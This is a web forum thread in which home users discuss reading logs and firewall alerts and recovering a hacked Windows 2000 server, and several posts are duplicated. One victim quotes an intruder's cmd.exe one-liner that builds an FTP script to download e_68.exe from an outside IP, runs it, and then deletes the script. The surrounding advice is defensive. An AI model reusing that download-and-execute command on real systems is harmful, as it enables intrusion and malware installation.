Mike Mullins' comments are good and I take them to heart. However, still being a novice, and realizing his page was not intended for novices, though perhaps others like me might agree, the question is HOW can I do what he advises? Literally, step by step, how can I . . .
1 check my traffic
2 see if my anti-virus software has been attacked
and so on and so on
thanks
t
Discussion on:
View:
Show:
Had a prof at the Big U, who described the worst test he ever had:
A. Define the Universe
B. Give three examples
Your question, while valid, is roughly equivalent to that test. You see, Mike's advice is necessarily generic, because there are so many different systems out there, from PCs to Macs to Solaris to Linux to VAXen to mainframes to...well, you get the idea. Not knowing what you're working on, it's tough to make suggestions. However, the easiest answer is to read your log files. In Windows, it's the Event Viewer. In most Linux/Unix boxes, it's usually something like /var/adm/messages. Learn to use the Windows filters, or to grep in L/Unix (or use something like LogWatch -- Google will help with that one). The next step is to go to sans.org, or any of a dozen other sites, and study up on what you should be looking for, because it's different for every different kind of box (and sometimes your firewall logs won't tell you what your web server logs will, so don't expect to catch everything in one place). Have fun with it, learn as much as you can, and let us know how it goes.
A. Define the Universe
B. Give three examples
Your question, while valid, is roughly equivalent to that test. You see, Mike's advice is necessarily generic, because there are so many different systems out there, from PCs to Macs to Solaris to Linux to VAXen to mainframes to...well, you get the idea. Not knowing what you're working on, it's tough to make suggestions. However, the easiest answer is to read your log files. In Windows, it's the Event Viewer. In most Linux/Unix boxes, it's usually something like /var/adm/messages. Learn to use the Windows filters, or to grep in L/Unix (or use something like LogWatch -- Google will help with that one). The next step is to go to sans.org, or any of a dozen other sites, and study up on what you should be looking for, because it's different for every different kind of box (and sometimes your firewall logs won't tell you what your web server logs will, so don't expect to catch everything in one place). Have fun with it, learn as much as you can, and let us know how it goes.
I really have no idea what to check on my Windows system. But, I read both the /var/log/auth and /var/log/pf.log on my unix system. The auth log tells me valid/invalid inputs via ssh. Oh, and my ftp logs. I found loads of information in them too. Brute force attempts. The pf log shows me, because of my settings. A pattern of who is being blocked based on my rule set. I'm going to install snort, which is a IDS(???). That analyzes all trafic to identify possible holes and attempts against my system that I have not previously blocked or accounted for.
Dan
Dan
Just checked my logs in my AV firewall, and for the windows firewall, then checked event viewer to find two unsucsessful attempts to log in to my account!
I then went to my windows firewall and found that ftp, telnet, remote desktop and http server were all enabled!
Ive been tracing IPs to Austrailia and Sweden. What can I do, I shut down the ports they opened, it seems that the Trend-microcillin firewall is blocking alot of UDP attempts from ports in the 30k range, and 1026 and 1027.
Scary stuff!
I then went to my windows firewall and found that ftp, telnet, remote desktop and http server were all enabled!
Ive been tracing IPs to Austrailia and Sweden. What can I do, I shut down the ports they opened, it seems that the Trend-microcillin firewall is blocking alot of UDP attempts from ports in the 30k range, and 1026 and 1027.
Scary stuff!
Sure, you might find something but even using filters you are bound to miss something. No sys admin has enough time to stay on top of such a herculean task not to mention the storage reqirements on a Windows server (no syslog built in) can be onerous. Your best bet is to get an IDS that will will proactively scan for suspicious behavior and use a tool that will scan the logs for you and alert you to based on predefined rules sets.
OK...I have been running a website, ftp server, etc from my home for about 1 year, with no problems. Just this week, my server was completely overtaken, and the sad thing is I caught them, just a little too late. They have completely corrupted my website, emptied all logs....and no telling what else. But what they don't know is that while they were trying to wrap things up, I got their IP address. The address looks like it came from my ISP. Is there anything that I can do to take legal action or find out who this person(s) are? PLEASE HELP...
It is not a business site, but it is a family website with pictures, news, etc. I need to know what I can do. I also discovered how they got in and I have closed that port, but I don't know if they opened any other doors. I have completed virus scans, adware/spyware scans. I also have a command line that was still in the system that I'm not sure what it does...it looks like they were trying to remove their IP address from accessing the FTP site.
THANKS IN ADVANCE FOR THE ADVICE
It is not a business site, but it is a family website with pictures, news, etc. I need to know what I can do. I also discovered how they got in and I have closed that port, but I don't know if they opened any other doors. I have completed virus scans, adware/spyware scans. I also have a command line that was still in the system that I'm not sure what it does...it looks like they were trying to remove their IP address from accessing the FTP site.
THANKS IN ADVANCE FOR THE ADVICE
Is it a windows or unix system?
Do you have a router between you and the machine that was hacked?
-- If you close off the ports at the router, then no matter what the machine thinks is open. Its not open to the world.
I run a unix server at home, and I found I was being pounded on by people looking for ways to get in. I did the following to tighten down my machine.
1). Only opened my ports at the router for ssh, ftp, and the web page.
2). Put in a unix firewall.
- did a lot of reading here, and found some good sugestions for generic blocks that stop spoofing and lynix box's that are scanning my machine.
3). Started reviewing my logs daily(ssh/ftp/web page). Looking for brute force attacks. When I found ip's that I didnt trust in my logs, instant firewalling to all services.
--- I automated some of this through perl and shell scripts. Have these scripts running every 2 minutes to check the logs. Im looking to get this to be real time.
If you tell me the os, I might be able to offer some other sugestions. And point you at some tutorials/forum postings/articles to further secure your machine.
Dan
Do you have a router between you and the machine that was hacked?
-- If you close off the ports at the router, then no matter what the machine thinks is open. Its not open to the world.
I run a unix server at home, and I found I was being pounded on by people looking for ways to get in. I did the following to tighten down my machine.
1). Only opened my ports at the router for ssh, ftp, and the web page.
2). Put in a unix firewall.
- did a lot of reading here, and found some good sugestions for generic blocks that stop spoofing and lynix box's that are scanning my machine.
3). Started reviewing my logs daily(ssh/ftp/web page). Looking for brute force attacks. When I found ip's that I didnt trust in my logs, instant firewalling to all services.
--- I automated some of this through perl and shell scripts. Have these scripts running every 2 minutes to check the logs. Im looking to get this to be real time.
If you tell me the os, I might be able to offer some other sugestions. And point you at some tutorials/forum postings/articles to further secure your machine.
Dan
It is a Windows 2000 server...with a linksys router between it and the world. I had ftp, web, remote admin web, several gaming and a voice communications application port open. I have closed all of the gaming, voice, remote admin, and web ports..the only thing open now is ftp. Which I feel may have been compromised some way to allow an intruder in.
This is the line I caught him typing in the run line:
cmd.exe /c del i&echo open 207.68.xxx.xxx 32676 > i&echo user 1 1 >> i &echo get e_68.exe >> i &echo quit >> i &ftp -n -s:i &e_68.exe&del i&exit
What does that do exactly?
Is there anything that I can do legally since he has destroyed an electronic property :D?
This is the line I caught him typing in the run line:
cmd.exe /c del i&echo open 207.68.xxx.xxx 32676 > i&echo user 1 1 >> i &echo get e_68.exe >> i &echo quit >> i &ftp -n -s:i &e_68.exe&del i&exit
What does that do exactly?
Is there anything that I can do legally since he has destroyed an electronic property :D?
It is a Windows 2000 server...with a linksys router between it and the world. I had ftp, web, remote admin web, several gaming and a voice communications application port open. I have closed all of the gaming, voice, remote admin, and web ports..the only thing open now is ftp. Which I feel may have been compromised some way to allow an intruder in.
This is the line I caught him typing in the run line:
cmd.exe /c del i&echo open 207.68.xxx.xxx 32676 > i&echo user 1 1 >> i &echo get e_68.exe >> i &echo quit >> i &ftp -n -s:i &e_68.exe&del i&exit
What does that do exactly?
Is there anything that I can do legally since he has destroyed an electronic property :D?
This is the line I caught him typing in the run line:
cmd.exe /c del i&echo open 207.68.xxx.xxx 32676 > i&echo user 1 1 >> i &echo get e_68.exe >> i &echo quit >> i &ftp -n -s:i &e_68.exe&del i&exit
What does that do exactly?
Is there anything that I can do legally since he has destroyed an electronic property :D?
*dale...
I am not a lawyer, and local laws vary in your availablerecourse.
General security practices would say if the machine has been compromised it is no longer yours and will not be yours again w/o a format & re-install. No amount of rooting out of intruders is 100% effective, so if you value the services this machine provides, take it offline, archive/disk-image if desired (to find and close the holes), and re-install. I'll second sans.org as an excellent resource for hardening systems.
The learning curve on hardening Windows 2k+ machines is steep but it can be done.
Good luck.
- Logan
I am not a lawyer, and local laws vary in your availablerecourse.
General security practices would say if the machine has been compromised it is no longer yours and will not be yours again w/o a format & re-install. No amount of rooting out of intruders is 100% effective, so if you value the services this machine provides, take it offline, archive/disk-image if desired (to find and close the holes), and re-install. I'll second sans.org as an excellent resource for hardening systems.
The learning curve on hardening Windows 2k+ machines is steep but it can be done.
Good luck.
- Logan
I can put Windows Server 2003 instead of 2000....Does anyone have any input as to which one is more secure?
Microsoft did a lot of work securing between releasing Windows 2000 and 2003. You'll find that 2003 doesn't automatically install some services eg IIS, so you'll have to add them yourself (usual thing: add/remove programs, select windows components, select he component you want and drop the cd in the drive etc). Micsorosft did this to reduce the attack surface of 2003: the less services running the less there is to attack.
And do remmber to go to windows update and get the latest security patches (for preference setup the automatic windows update to do this on a schedule!)
Good luck
And do remmber to go to windows update and get the latest security patches (for preference setup the automatic windows update to do this on a schedule!)
Good luck
I'll second that answer on 2003. Much more secure, plus IIS has been upgraded to version 6 from 5. Big difference in security.
I have completed the 2003 installation and services...All seems good except for logging into my website....NO ONE can log in. I even looked at the asp.net configurations and users, they are all still there. Don't know what to do about that one...It is running from a SQL 2005 express DB...so if any gurus out there would like to help on that situation, I would be much appreciative....
But thanks again for the advice to do a clean sweep and reinstall 2003...It seems to run smoother on that machine as well.
But thanks again for the advice to do a clean sweep and reinstall 2003...It seems to run smoother on that machine as well.
I do under stand that anti-virus, windows updates--etc. occur during idle times, however, I seem to be getting activity from the isp TO my network on a regular basis--should I be concerned??
Mix
Mix
- Keyboard Shortcuts:
- Prev
- Next
- Toggle
